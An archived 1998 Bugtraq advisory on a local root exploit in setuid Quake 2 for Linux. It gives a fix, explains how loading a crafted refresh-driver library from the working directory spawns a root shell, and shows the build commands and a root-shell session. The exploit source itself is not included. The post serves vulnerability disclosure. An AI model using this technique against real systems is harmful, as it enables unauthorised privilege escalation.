Bugtraq mailing list archives
Quake 2 Linux
From: kevingeo () CRUZIO COM
Date: Mon, 26 Jan 1998 01:16:37 -0500
Vulnerable: Anyone who made Quake2 setuid root in order to use the svgalib software refresh.

Solution: chmod u-s quake2, and use ref_softx instead of ref_soft. If you prefer console-based video, you could get GGI (http://synergy.caltech.edu/~ggi/), and use KGI with the SVGAlib wrapper (I haven't tried this).

Exploit: Quake2 uses dlopen(3) to load its graphics code (which is in a separate shared library). dlopen calls the _init function (if applicable) before it returns. Quake2 allows you to set which refresh driver to use on the command line, and loads the .so file from the working directory. The exploit is a shared library with one function: _init. It sets the uid and gid to 0, and spawns a shell.

    nop@chrome:~/ref_root> id
    uid=501(nop) gid=100(users) groups=100(users)
    nop@chrome:~/ref_root> make
    gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC
    ld -m elf_i386 -shared -o ref_root.so -soname ref_root /usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
    nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root
    couldn't exec default.cfg
    couldn't exec config.cfg
    Console initialized.
    ------- Loading ref_root.so -------
    sh-2.00#
    sh-2.00# id
    uid=0(root) gid=0(root) groups=100(users)
    sh-2.00#

exploit code follows.